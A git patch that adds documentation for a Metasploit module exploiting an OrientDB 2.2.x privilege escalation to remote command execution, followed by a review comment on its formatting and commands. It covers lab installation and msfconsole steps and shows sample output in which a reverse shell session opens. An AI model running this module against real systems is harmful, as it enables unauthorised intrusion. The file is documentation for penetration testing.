From 00a817d2281d0d72f71d2cba481b05f57ca06e22 Mon Sep 17 00:00:00 2001 From: Ricardo Almeida Date: Thu, 20 Jul 2017 09:03:26 +0100 Subject: [PATCH] Orientdb 2.2.x RCE - Add documentation --- .../exploit/multi/http/orientdb_exec.md | 44 +++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 documentation/modules/exploit/multi/http/orientdb_exec.md diff --git a/documentation/modules/exploit/multi/http/orientdb_exec.md b/documentation/modules/exploit/multi/http/orientdb_exec.md new file mode 100644 index 0000000000..fd897dc95a --- /dev/null +++ b/documentation/modules/exploit/multi/http/orientdb_exec.md 
@@ -0,0 +1,44 @@ +This module leverages a privilege escalation on OrientDB to execute unsandboxed OS commands. + +All versions from 2.2.1 up to 2.2.22 should be vulnerable. + +The module is based on the public PoC found here: https://blogs.securiteam.com/index.php/archives/3318 + +## Vulnerable Application +OrientDB 2.2.1 <= 2.2.22 + +## Installation +Download a vulnerable OrientDB version here: http://orientdb.com/download-previous/ +`$ wget http://orientdb.com/download.php?file=orientdb-community-2.2.20.zip&os=multi` +`$ unzip orientdb-community-2.2.20.zip` +`$ chmod 755 bin/*.sh` +`$ chmod -R 777 config` +`$ cd bin` +`$ ./server.sh` + +## References for running OrientDB +http://orientdb.com/docs/2.0/orientdb.wiki/Tutorial-Installation.html +http://orientdb.com/docs/2.0/orientdb.wiki/Tutorial-Run-the-server.html + +## References for vulnerability +https://blogs.securiteam.com/index.php/archives/3318 +http://www.palada.net/index.php/2017/07/13/news-2112/ +https://github.com/orientechnologies/orientdb/wiki/OrientDB-2.2-Release-Notes#2223---july-11-2017 + +## Verification Steps +- [ ] Start `msfconsole` +- [ ] `use exploit/multi/http/orientdb_exec` +- [ ] `set rhost ` +- [ ] `set target ` +- [ ] `set workspace ` +- [ ] `check` +- [ ] **Verify** if the OrientDB instance is vulnerable +- [ ] `run` +- [ ] **Verify** you get a session + +## Example Output +`[LHOST:127.0.0.1][Workspace:default][Jobs:0][Sessions:0][/Users/vibrio] exploit(orientdb_exec) > run` +`[*] [2017.07.18-15:55:47] Started reverse TCP handler on 127.0.0.1:37331` +`[*] [2017.07.18-15:55:49] 127.0.0.1:2480 - Sending payload...` +`[*] Command shell session 1 opened (127.0.0.1:37331 -> 127.0.0.1:46594) at 2017-07-18 15:55:49 +0100` +
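Review bot: the Verification Steps leave `set rhost `, `set target ` and `set workspace ` with no placeholder value, which looks like angle-bracket placeholders (e.g. `<ip>`) were swallowed by the markdown; restore them inside the backticks (`set rhost <target ip>`) and list the module's available targets so readers know what `set target` expects. In the Installation section the wget URL contains an unquoted `&`, so the shell backgrounds wget and treats `os=multi` as a separate command; quote the URL (`$ wget 'http://orientdb.com/download.php?file=orientdb-community-2.2.20.zip&os=multi'`) and add `-O orientdb-community-2.2.20.zip`, otherwise wget saves the file under the `download.php?...` name and the following `unzip orientdb-community-2.2.20.zip` step fails. Minor: `chmod -R 777 config` is broader than a lab install needs, "OrientDB 2.2.1 <= 2.2.22" reads better as "2.2.1 through 2.2.22", and the "References for running OrientDB" links point at the 2.0 docs although the module targets 2.2.x.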